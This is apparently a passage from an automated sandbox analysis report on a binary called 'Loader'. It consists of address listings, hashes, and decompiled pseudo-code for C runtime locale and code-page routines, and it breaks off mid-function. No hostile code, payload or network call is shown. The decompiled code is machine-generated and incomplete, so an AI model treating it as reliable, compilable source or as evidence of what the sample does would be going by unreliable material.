0x00b00e57
0x00b00e59
0x00b00f00
0x00b00f00
0x00b00f03
0x00000000
0x00b00f09
0x00b00f09
0x00b00f0f
0x00000000
0x00b00f0f
0x00b00e5f
0x00b00e5f
0x00b00e5f
0x00b00e62
0x00000000
0x00000000
0x00b00e64
0x00b00e66
0x00b00e6e
0x00b00e77
0x00b00e77
0x00b00e79
0x00b00e79
0x00b00e8b
0x00b00e8e
0x00b00e94
0x00b00e9d
0x00b00ea0
0x00b00ead
0x00b00eb0
0x00b00eb1
0x00b00eb2
0x00b00eb8
0x00b00eba
0x00b00ec0
0x00b00ec6
0x00000000
0x00000000
0x00000000
0x00000000
0x00b00ec8
0x00b00ec8
0x00b00ec8
0x00b00eca
0x00000000
0x00000000
0x00b00ecc
0x00b00ecf
0x00b00ff2
0x00b00ff2
0x00000000
0x00b00ed5
0x00b00ed5
0x00b00ed7
0x00b00ed9
0x00b00ed9
0x00b00ed9
0x00b00ee1
0x00b00ee4
0x00b00ee4
0x00b00eea
0x00b00eec
0x00b00eee
0x00b00ef5
0x00b00efb
0x00b00efd
0x00000000
0x00b00efd
0x00000000
0x00b00ecf
0x00000000
0x00b00ec8
0x00000000
0x00b00e5f
0x00b00e29
0x00b00e29
0x00b00e2b
0x00b00e31
0x00b00e39
0x00b00e39
0x00b00e3c
0x00b00e3c
0x00000000
0x00b00e2b
0x00000000
0x00b00f15
0x00b00f15
0x00b00f16
0x00b00f16
0x00000000
0x00b00e23
0x00b00cf2
0x00b00cf8
0x00b00cfd
0x00b00d0f
0x00b00d1e
0x00b00d23
0x00b00d29
0x00b00d2c
0x00b00d2e
0x00b00d48
0x00b00d4a
0x00000000
0x00b00d50
0x00b00d50
0x00b00d57
0x00000000
0x00b00d5d
0x00b00d63
0x00b00d69
0x00b00d6b
0x00b00d6b
0x00b00d6d
0x00b00d6d
0x00b00d76
0x00b00d7d
0x00b00d83
0x00b00d86
0x00b00d87
0x00b00d89
0x00b00d89
0x00b00d91
0x00b00d93
0x00000000
0x00b00d99
0x00b00d99
0x00b00d9f
0x00b00da2
0x00b00ff7
0x00b00ffa
0x00b01000
0x00b01015
0x00b0101a
0x00b0101d
0x00b00da8
0x00b00da8
0x00b00daf
0x00000000
0x00b00daf
0x00b00da2
0x00b00d93
0x00b00d57
0x00b00d30
0x00b00d30
0x00b00d36
0x00b00d3c
0x00b00d3d
0x00b00f33
0x00b00f33
0x00b00f3a
0x00b00f3b
0x00b00f3c
0x00b00f41
0x00b00f44
0x00b00f44
0x00b00f44
0x00b00d2e
0x00b00c1a
0x00b00c1a
0x00b00c20
0x00b00c22
0x00b00c5a
0x00b00c5c
0x00000000
0x00b00c5e
0x00b00c5e
0x00b00c65
0x00000000
0x00b00c67
0x00b00c6d
0x00b00c6f
0x00b00c75
0x00b00c75
0x00b00c77
0x00b00c77
0x00b00c79
0x00b00c82
0x00b00c89
0x00b00c8c
0x00b00c8d
0x00b00c8f
0x00b00c8f
0x00b00c97
0x00b00c99
0x00000000
0x00b00c9b
0x00b00c9b
0x00b00ca1
0x00b00ca4
0x00b00cb8
0x00b00cbe
0x00b00cd7
0x00b00cdc
0x00b00cdf
0x00000000
0x00b00ca6
0x00b00ca6
0x00b00cad
0x00000000
0x00b00cad
0x00b00ca4
0x00b00c99
0x00b00c65
0x00000000
0x00b00c24
0x00b00c24
0x00b00c27
0x00b00c2d
0x00b00c46
0x00b00c4b
0x00b00c4e
0x00b00c4e
0x00b00c4e
0x00b00c50
0x00b00c50
0x00b00c50
0x00b00f46
0x00b00f46
0x00b00f48
0x00b01024
0x00b0102b
0x00b01032
0x00b01045
0x00b0104b
0x00b0104c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00b00f4e
0x00b00f54
0x00b00f54
0x00b00f5a
0x00b00f5a
0x00b00f66
0x00000000
0x00b00f66
0x00b006ad
0x00b006ad
0x00b006af
0x00b006b5
0x00b006b7
0x00b006bd
0x00b006bf
0x00b00a9f
0x00b00a9f
0x00b00aa1
0x00b00aa7
0x00b00aae
0x00b00ab4
0x00b00ab6
0x00b00b1a
0x00b00b1c
0x00b00b22
0x00b00b28
0x00b00b2a
0x00b00b30
0x00b00b37
0x00b00b37
0x00b00b39
0x00b00b39
0x00b00b46
0x00b00b4d
0x00b00b53
0x00b00b56
0x00b00b57
0x00b00b5d
0x00b00b5d
0x00b00b61
0x00b00b63
0x00b00b69
0x00b00b6f
0x00b00b72
0x00000000
0x00b00b78
0x00b00b78
0x00b00b7f
0x00b00b7f
0x00b00b72
0x00b00b63
0x00b00b2a
0x00b00ab8
0x00b00ab8
0x00b00aba
0x00b00ac0
0x00b00ac6
0x00000000
0x00b00ac6
0x00b00ab6
0x00b006c5
0x00b006c5
0x00b006c5
0x00b006c8
0x00b006cc
0x00b006cc
0x00b006cd
0x00b006df
0x00b006ec
0x00b006fb
0x00b00725
0x00b0072a
0x00b00730
0x00b00733
0x00b00735
0x00b00807
0x00b0080d
0x00b008f1
0x00b008f7
0x00b008fd
0x00b008fd
0x00b008fd
0x00b00900
0x00b00902
0x00b00902
0x00b00908
0x00b0090e
0x00b00914
0x00b00916
0x00b00918
0x00b00918
0x00b0091e
0x00b00924
0x00b00926
0x00b00932
0x00b00938
0x00b00928
0x00b00928
0x00b0092a
0x00b0092a
0x00b0093e
0x00b00940
0x00b00942
0x00b00942
0x00b00948
0x00b0094a
0x00b0094c
0x00b00952
0x00b00954
0x00b00a55
0x00b00a55
0x00b00a5b
0x00b00a60
0x00b00a60
0x00b00a63
0x00b00a64
0x00000000
0x00b0095a
0x00b0095a
0x00b0095a
0x00b0095e
0x00b0097e
0x00b00980
0x00b00982
0x00b00988
0x00b0098e
0x00b00990
0x00b00a37
0x00b00a37
0x00b00a3a
0x00000000
0x00b00a40
0x00b00a40
0x00b00a46
0x00000000
0x00b00a46
0x00b00996
0x00b00996
0x00b00996
0x00b00999
0x00000000
0x00000000
0x00b0099b
0x00b0099d
0x00b009a5
0x00b009ae
0x00b009ae
0x00b009b0
0x00b009b0
0x00b009c2
0x00b009c5
0x00b009cb
0x00b009d4
0x00b009d7
0x00b009e4
0x00b009e7
0x00b009e8
0x00b009e9
0x00b009ef
0x00b009f1
0x00b009f7
0x00b009fd
0x00000000
0x00000000
0x00000000
0x00000000
0x00b009ff
0x00b009ff
0x00b009ff
0x00b00a01
0x00000000
0x00000000
0x00b00a03
0x00b00a06
0x00b00ac9
0x00b00ac9
0x00b00acb
0x00b00ad0
0x00b00ad6
0x00b00adc
0x00b00add
0x00000000
0x00b00a0c
0x00b00a0c
0x00b00a0e
0x00b00a10
0x00b00a10
0x00b00a10
0x00b00a18
0x00b00a1b
0x00b00a1b
0x00b00a21
0x00b00a23
0x00b00a25
0x00b00a2c
0x00b00a32
0x00b00a34
0x00000000
0x00b00a34
0x00000000
0x00b00a06
0x00000000
0x00b009ff
0x00000000
0x00b00996
0x00b00960
0x00b00960
0x00b00962
0x00b00968
0x00b00970
0x00b00970
0x00b00973
0x00b00973
0x00000000
0x00b00962
0x00000000
0x00b00a4c
0x00b00a4c
0x00b00a4d
0x00b00a4d
0x00000000
0x00b0095a
0x00b00813
0x00b00819
0x00b0081e
0x00b00830
0x00b0083f
0x00b00844
0x00b0084a
0x00b0084d
0x00b0084f
0x00b00869
0x00b0086b
0x00000000
0x00b00871
0x00b00871
0x00b00878
0x00000000
0x00b0087e
0x00b00884
0x00b0088a
0x00b0088c
0x00b0088c
0x00b0088e
0x00b0088e
0x00b00897
0x00b0089e
0x00b008a4
0x00b008a7
0x00b008a8
0x00b008aa
0x00b008aa
0x00b008b2
0x00b008b4
0x00000000
0x00b008ba
0x00b008ba
0x00b008c0
0x00b008c3
0x00b008d9
0x00b008df
0x00b008e5
0x00b008e6
0x00b00ae3
0x00b00ae3
0x00b00aea
0x00b00aeb
0x00b00aec
0x00b00af1
0x00b00af4
0x00b008c5
0x00b008c5
0x00b008cc
0x00000000
0x00b008cc
0x00b008c3
0x00b008b4
0x00b00878
0x00b00851
0x00b00851
0x00b00857
0x00b0085d
0x00b0085e
0x00b00a6a
0x00b00a6a
0x00b00a71
0x00b00a72
0x00b00a73
0x00b00a78
0x00b00a7b
0x00b00a7b
0x00b00a7b
0x00b0084f
0x00b0073b
0x00b0073b
0x00b00741
0x00b00743
0x00b0077b
0x00b0077d
0x00000000
0x00b0077f
0x00b0077f
0x00b00786
0x00000000
0x00b00788
0x00b0078e
0x00b00790
0x00b00796
0x00b00796
0x00b00798
0x00b00798
0x00b0079a
0x00b007a3
0x00b007aa
0x00b007ad
0x00b007ae
0x00b007b0
0x00b007b0
0x00b007b8
0x00b007ba
0x00000000
0x00b007bc
0x00b007bc
0x00b007c2
0x00b007c5
0x00b007d9
0x00b007df
0x00b007f8
0x00b007fd
0x00b00800
0x00000000
0x00b007c7
0x00b007c7
0x00b007ce
0x00000000
0x00b007ce
0x00b007c5
0x00b007ba
0x00b00786
0x00000000
0x00b00745
0x00b00745
0x00b00748
0x00b0074e
0x00b00767
0x00b0076c
0x00b0076f
0x00b0076f
0x00b0076f
0x00b00771
0x00b00771
0x00b00771
0x00b00a7d
0x00b00a7d
0x00b00a7f
0x00b00af8
0x00b00aff
0x00b00aff
0x00b00aff
0x00b00b06
0x00b00b08
0x00b00b0e
0x00b00b0f
0x00b01052
0x00b01052
0x00b01053
0x00b01054
0x00b01059
0x00000000
0x00000000
0x00000000
0x00000000
0x00b00a81
0x00b00a87
0x00b00a87
0x00b00a8d
0x00b00a8d
0x00b00a99
0x00000000
0x00b00a99
0x00b006bf
0x00b0105c
0x00b0105c
0x00b01062
0x00b01068
0x00b0106e
0x00b01070
0x00b01072
0x00b01079
0x00b01079
0x00b0107b
0x00b0107b
0x00b01084
0x00b01085
0x00b0108d
0x00b01094
0x00b01097
0x00b01098
0x00b0109e
0x00b0109e
0x00b010a2
0x00b010a8
0x00b010aa
0x00b010ac
0x00b010b2
0x00b010b5
0x00b010c6
0x00b010c9
0x00b010cf
0x00b010e4
0x00b010e9
0x00b010b7
0x00b010b7
0x00b010be
0x00b010be
0x00b010b5
0x00b010aa
0x00b010fa
0x00b01101
0x00b01109
0x00b0110a
0x00b0110c
0x00b01258
0x00b0125a
0x00b0126a
0x00b0126d
0x00b0126f
0x00000000
0x00b0125c
0x00b01262
0x00000000
0x00b01262
0x00000000
0x00b01112
0x00b01112
0x00b01118
0x00b0111b
0x00b01121
0x00b01124
0x00b0112a
0x00b01130
0x00b01132
0x00b01134
0x00b01136
0x00b01136
0x00b01138
0x00b01138
0x00b01145
0x00b0114c
0x00b0114f
0x00b01150
0x00b01152
0x00b01153
0x00b01153
0x00b0115b
0x00b01161
0x00b01163
0x00b01169
0x00b0116b
0x00b01171
0x00b01174
0x00b01230
0x00b01236
0x00b0124b
0x00b01250
0x00b0117a
0x00b01180
0x00b01187
0x00b01187
0x00b01187
0x00b01187
0x00b01174
0x00b0118d
0x00b0118d
0x00b01193
0x00b01193
0x00b01193
0x00b01199
0x00b0119f
0x00b011a2
0x00b011a8
0x00b011aa
0x00b011ac
0x00b011b2
0x00b011b4
0x00b011b4
0x00b011b4
0x00b011b2
0x00b011b9
0x00b011ba
0x00b011bc
0x00b011be
0x00b011be
0x00b011c0
0x00b011c2
0x00b011c8
0x00b011ca
0x00b011d0
0x00b011d0
0x00b011d6
0x00b011d8
0x00000000
0x00000000
0x00b011de
0x00b011e0
0x00b011e2
0x00b011e2
0x00b011e4
0x00b011e4
0x00b011f4
0x00b011fb
0x00b011fe
0x00b011ff
0x00b01201
0x00b01201
0x00b01205
0x00b0120b
0x00b0120d
0x00b01213
0x00b01219
0x00b0121c
0x00b0127a
0x00b0127d
0x00b01283
0x00b01298
0x00b0129d
0x00b0121e
0x00b0121e
0x00b01225
0x00b01225
0x00b0121c
0x00b012ae
0x00b012b3
0x00b012c2
0x00b012c5
0x00b012cf
0x00b012cf
0x00b012d1
0x00b012d3
0x00b012d9
0x00b012e1
0x00b012e7
0x00b012e9
0x00b012ef
0x00b012f1
0x00b012fe
0x00b012f3
0x00b012f3
0x00b012fa
0x00b012fa
0x00b01301
0x00b01307
0x00b01308
0x00b0130e
0x00b0130e
0x00b01313
0x00b01316
0x00b0131a
0x00b0131a
0x00b0131b
0x00b0131d
0x00b01323
0x00b01329
0x00000000
0x00000000
0x00000000
0x00b01329
0x00b011d0
0x00b0132f
0x00b01331
0x00b01334
0x00b01336
0x00b01339
0x00b0133f
0x00000000
0x00b0133f
0x00afffd5
0x00afffcc
0x00afffc3
0x00afff58
0x00afff5d
0x00afff65
0x00afff79
0x00afff7e
0x00afff82
0x00afff82
0x00afff85
0x00afff95
0x00b013a4
0x00b013a6
0x00b013a7
0x00b013a8
0x00b013a9
0x00b013aa
0x00b013ab
0x00b013b0
0x00b013b3
0x00b013b6
0x00b013b9
0x00b013bc
0x00b013cb
0x00b013cd
0x00b013f3
0x00b013f8
0x00b013fe
0x00000000
0x00b013cf
0x00b013cf
0x00b013d5
0x00000000
0x00b013d7
0x00b013ee
0x00b013ee
0x00b013f2
0x00b013f2
0x00b013d5
0x00b013be
0x00b013c3
0x00b01403
0x00b01403
0x00b01406
0x00b01406
0x00afff9b
0x00b0137d
0x00b0137d
0x00b01384
0x00b01385
0x00b01386
0x00b0138f
0x00b01394
0x00b0139c
0x00b013a3
0x00b013a3
0x00000000
0x00000000
0x00000000
0x00afff65

APIs

__floor_pentium4.LIBCMT ref: 00B00066

Strings

1#QNAN, xrefs: 00B01357
1#IND, xrefs: 00B01343
1#SNAN, xrefs: 00B0134D
1#INF, xrefs: 00B01361

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 766ada66d4850cfe4c9b2c6bd1cd063fd94424d50e9f6614c5b6358618a1072c
Instruction ID: 16e36c728c94e4597e8985f2f7038a8343a9ed4088f542d07e69ff90c46b7431
Opcode Fuzzy Hash: 766ada66d4850cfe4c9b2c6bd1cd063fd94424d50e9f6614c5b6358618a1072c
Instruction Fuzzy Hash: C6D24A71E186298FDB65DE28DD807EABBF5EB44304F1445EAD40DE7280E778AE818F41

Uniqueness

Uniqueness Score: -1.00%

Function 00AFF109 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 94%

			E00AFF109(void* __ecx, signed int _a4, intOrPtr _a8) {
				short _v8;
				short _t17;
				signed int _t18;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_push(__ecx);
				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					if(GetLocaleInfoW( *(_a8 + 8), 0x20001004,  &_v8, 2) != 0) {
						_t17 = _v8;
						if(_t17 == 0) {
							_t17 = GetACP();
						}
						L25:
						return _t17;
					}
					L22:
					_t17 = 0;
					goto L25;
				}
				_t18 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = L"ACP";
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t18;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = L"OCP";
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								if(_t18 != 0) {
									_t17 = E00AF4429(_t23, _t23);
									goto L25;
								}
								if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t17 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t18 = _t18 | 0x00000001;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				goto L9;
			}

0x00aff10e
0x00aff10f
0x00aff116
0x00aff1ba
0x00aff1d3
0x00aff1d9
0x00aff1de
0x00aff1e0
0x00aff1e0
0x00aff1e6
0x00aff1e9
0x00aff1e9
0x00aff1d5
0x00aff1d5
0x00000000
0x00aff1d5
0x00aff11c
0x00aff121
0x00000000
0x00000000
0x00aff127
0x00aff12c
0x00aff12e
0x00aff12e
0x00aff134
0x00000000
0x00000000
0x00aff139
0x00aff150
0x00aff150
0x00aff159
0x00aff15b
0x00000000
0x00000000
0x00aff15d
0x00aff162
0x00aff164
0x00aff164
0x00aff16a
0x00000000
0x00000000
0x00aff16f
0x00aff18d
0x00aff18f
0x00aff1b2
0x00000000
0x00aff1b7
0x00aff1aa
0x00000000
0x00000000
0x00aff1ac
0x00000000
0x00aff1ac
0x00aff171
0x00aff179
0x00000000
0x00000000
0x00aff17b
0x00aff17e
0x00aff184
0x00000000
0x00000000
0x00000000
0x00aff186
0x00aff188
0x00aff18a
0x00000000
0x00aff18a
0x00aff13b
0x00aff143
0x00000000
0x00000000
0x00aff145
0x00aff148
0x00aff14e
0x00000000
0x00000000
0x00000000
0x00aff14e
0x00aff154
0x00aff156
0x00000000

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00AFF427,00000002,00000000,?,?,?,00AFF427,?,00000000), ref: 00AFF1A2
GetLocaleInfoW.KERNEL32(?,20001004,00AFF427,00000002,00000000,?,?,?,00AFF427,?,00000000), ref: 00AFF1CB
GetACP.KERNEL32(?,?,00AFF427,?,00000000), ref: 00AFF1E0

Strings

ACP, xrefs: 00AFF127
OCP, xrefs: 00AFF15D

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 7ea2780d60419cef0c2745427ac0f48a691ef7a25b99c95e3505b768bed230cd
Instruction ID: 7902a468b78587ee3d19b53447f899c89d79822ff0ce74db0e2a4f3e571ec3cc
Opcode Fuzzy Hash: 7ea2780d60419cef0c2745427ac0f48a691ef7a25b99c95e3505b768bed230cd
Instruction Fuzzy Hash: EA217472600109EEDB348F95CD01ABBB6B6AF54B64B568674FB0AD7204E732DE40C358

Uniqueness

Uniqueness Score: -1.00%

Function 00AFF2DE Relevance: 7.7, APIs: 5, Instructions: 183
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 90%

			E00AFF2DE(void* __ecx, void* __edx, void* __eflags, signed short _a4, short* _a8, short* _a12) {
				signed int _v8;
				int _v12;
				int _v16;
				char _v20;
				signed short* _v24;
				short* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t39;
				void* _t45;
				signed short* _t46;
				signed short _t47;
				short* _t48;
				int _t49;
				void* _t53;
				short* _t55;
				short* _t56;
				short* _t57;
				int _t64;
				int _t66;
				short* _t70;
				intOrPtr _t73;
				void* _t75;
				short* _t76;
				intOrPtr _t83;
				short* _t86;
				short* _t89;
				short** _t99;
				short* _t100;
				signed short _t101;
				signed int _t104;
				void* _t105;

				_t39 =  *0xb36bac; // 0x85d5fe2b
				_v8 = _t39 ^ _t104;
				_t86 = _a12;
				_t101 = _a4;
				_v28 = _a8;
				_v24 = E00AF4840(__ecx, __edx) + 0x50;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t45 = E00AF4840(__ecx, __edx);
				_t97 = 0;
				 *((intOrPtr*)(_t45 + 0x34c)) =  &_v20;
				_t89 = _t101 + 0x80;
				_t46 = _v24;
				 *_t46 = _t101;
				_t99 =  &(_t46[2]);
				 *_t99 = _t89;
				if(_t89 != 0 &&  *_t89 != 0) {
					_t83 =  *0xb0a9f4; // 0x17
					E00AFF27D(_t89, 0, 0xb0a8e0, _t83 - 1, _t99);
					_t46 = _v24;
					_t105 = _t105 + 0xc;
					_t97 = 0;
				}
				_v20 = _t97;
				_t47 =  *_t46;
				if(_t47 == 0 ||  *_t47 == _t97) {
					_t48 =  *_t99;
					__eflags = _t48;
					if(_t48 == 0) {
						L19:
						_v20 = 0x104;
						_t49 = GetUserDefaultLCID();
						_v12 = _t49;
						_v16 = _t49;
						goto L20;
					}
					__eflags =  *_t48 - _t97;
					if(__eflags == 0) {
						goto L19;
					}
					E00AFEC1F(_t89, _t97, __eflags,  &_v20);
					_pop(_t89);
					goto L20;
				} else {
					_t70 =  *_t99;
					if(_t70 == 0) {
						L8:
						E00AFED05(_t89, _t97, __eflags,  &_v20);
						L9:
						_pop(_t89);
						if(_v20 != 0) {
							_t100 = 0;
							__eflags = 0;
							L25:
							asm("sbb esi, esi");
							_t101 = E00AFF109(_t89,  ~_t101 & _t101 + 0x00000100,  &_v20);
							__eflags = _t101;
							if(_t101 == 0) {
								L22:
								_t53 = 0;
								L23:
								return E00AE95ED(_t53, _t86, _v8 ^ _t104, _t97, _t100, _t101);
							}
							_t55 = IsValidCodePage(_t101 & 0x0000ffff);
							__eflags = _t55;
							if(_t55 == 0) {
								goto L22;
							}
							_t56 = IsValidLocale(_v16, 1);
							__eflags = _t56;
							if(_t56 == 0) {
								goto L22;
							}
							_t57 = _v28;
							__eflags = _t57;
							if(_t57 != 0) {
								 *_t57 = _t101;
							}
							E00AF6CA7(_v16,  &(_v24[0x128]), 0x55, _t100);
							__eflags = _t86;
							if(_t86 == 0) {
								L34:
								_t53 = 1;
								goto L23;
							}
							_t33 =  &(_t86[0x90]); // 0xd0
							E00AF6CA7(_v16, _t33, 0x55, _t100);
							_t64 = GetLocaleInfoW(_v16, 0x1001, _t86, 0x40);
							__eflags = _t64;
							if(_t64 == 0) {
								goto L22;
							}
							_t36 =  &(_t86[0x40]); // 0x30
							_t66 = GetLocaleInfoW(_v12, 0x1002, _t36, 0x40);
							__eflags = _t66;
							if(_t66 == 0) {
								goto L22;
							}
							_t38 =  &(_t86[0x80]); // 0xb0
							E00B0294E(_t38, _t101, _t38, 0x10, 0xa);
							goto L34;
						}
						_t73 =  *0xb0a8dc; // 0x41
						_t75 = E00AFF27D(_t89, _t97, 0xb0a5d0, _t73 - 1, _v24);
						_t105 = _t105 + 0xc;
						if(_t75 == 0) {
							L20:
							_t100 = 0;
							__eflags = 0;
							L21:
							if(_v20 != 0) {
								goto L25;
							}
							goto L22;
						}
						_t76 =  *_t99;
						_t100 = 0;
						if(_t76 == 0) {
							L14:
							E00AFED05(_t89, _t97, __eflags,  &_v20);
							L15:
							_pop(_t89);
							goto L21;
						}
						_t118 =  *_t76;
						if( *_t76 == 0) {
							goto L14;
						}
						E00AFEC6A(_t89, _t97, _t118,  &_v20);
						goto L15;
					}
					_t114 =  *_t70 - _t97;
					if( *_t70 == _t97) {
						goto L8;
					}
					E00AFEC6A(_t89, _t97, _t114,  &_v20);
					goto L9;
				}
			}

0x00aff2e6
0x00aff2ed
0x00aff2f4
0x00aff2f8
0x00aff2fc
0x00aff30a
0x00aff30f
0x00aff310
0x00aff311
0x00aff312
0x00aff31a
0x00aff31c
0x00aff322
0x00aff328
0x00aff32b
0x00aff32d
0x00aff330
0x00aff334
0x00aff33b
0x00aff348
0x00aff34d
0x00aff350
0x00aff353
0x00aff353
0x00aff355
0x00aff358
0x00aff35c
0x00aff3cc
0x00aff3ce
0x00aff3d0
0x00aff3e3
0x00aff3e3
0x00aff3ea
0x00aff3f0
0x00aff3f3
0x00000000
0x00aff3f3
0x00aff3d2
0x00aff3d5
0x00000000
0x00000000
0x00aff3db
0x00aff3e0
0x00000000
0x00aff363
0x00aff363
0x00aff367
0x00aff379
0x00aff37d
0x00aff382
0x00aff386
0x00aff387
0x00aff40f
0x00aff40f
0x00aff411
0x00aff41d
0x00aff427
0x00aff42b
0x00aff42d
0x00aff3fe
0x00aff3fe
0x00aff400
0x00aff40e
0x00aff40e
0x00aff433
0x00aff439
0x00aff43b
0x00000000
0x00000000
0x00aff442
0x00aff448
0x00aff44a
0x00000000
0x00000000
0x00aff44c
0x00aff44f
0x00aff451
0x00aff453
0x00aff453
0x00aff464
0x00aff469
0x00aff46b
0x00aff4cb
0x00aff4cd
0x00000000
0x00aff4cd
0x00aff470
0x00aff47a
0x00aff48a
0x00aff490
0x00aff492
0x00000000
0x00000000
0x00aff49a
0x00aff4a9
0x00aff4af
0x00aff4b1
0x00000000
0x00000000
0x00aff4bb
0x00aff4c3
0x00000000
0x00aff4c8
0x00aff38d
0x00aff39c
0x00aff3a1
0x00aff3a6
0x00aff3f6
0x00aff3f6
0x00aff3f6
0x00aff3f8
0x00aff3fc
0x00000000
0x00000000
0x00000000
0x00aff3fc
0x00aff3a8
0x00aff3aa
0x00aff3ae
0x00aff3c0
0x00aff3c4
0x00aff3c9
0x00aff3c9
0x00000000
0x00aff3c9
0x00aff3b0
0x00aff3b3
0x00000000
0x00000000
0x00aff3b9
0x00000000
0x00aff3b9
0x00aff369
0x00aff36c
0x00000000
0x00000000
0x00aff372
0x00000000
0x00aff372

APIs

Part of subcall function 00AF4840: GetLastError.KERNEL32(?,00000000,?,00AED8CE,00000000,00000000,?,?,00AF6FF2,00000000,00000000,?,00000000,?), ref: 00AF4845
Part of subcall function 00AF4840: SetLastError.KERNEL32(00000000,00000005,000000FF,?,00AF6FF2,00000000,00000000,?,00000000,?), ref: 00AF48E3

Part of subcall function 00AF4840: _free.LIBCMT ref: 00AF48A2
Part of subcall function 00AF4840: _free.LIBCMT ref: 00AF48D8

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00AFF3EA
IsValidCodePage.KERNEL32(00000000), ref: 00AFF433
IsValidLocale.KERNEL32(?,00000001), ref: 00AFF442
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00AFF48A
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00AFF4A9

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
String ID:
API String ID: 949163717-0
Opcode ID: 4e296aa308fdb34a8469f2e60f75954c6b4faff6ebf761abd132f07bdd02b6c4
Instruction ID: 9528f1c52efa67df7be1339d0cba32c19a209ae553704755bed9532262073fb5
Opcode Fuzzy Hash: 4e296aa308fdb34a8469f2e60f75954c6b4faff6ebf761abd132f07bdd02b6c4
Instruction Fuzzy Hash: BC514B72A0060AAFDB20DFE5CD45ABF77B8EF48700F144579BA21EB190EB7099448B61

Uniqueness

Uniqueness Score: -1.00%

Function 00AE9814 Relevance: 6.1, APIs: 4, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00AE9814(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t39;
				long _t49;
				intOrPtr _t51;
				void* _t54;
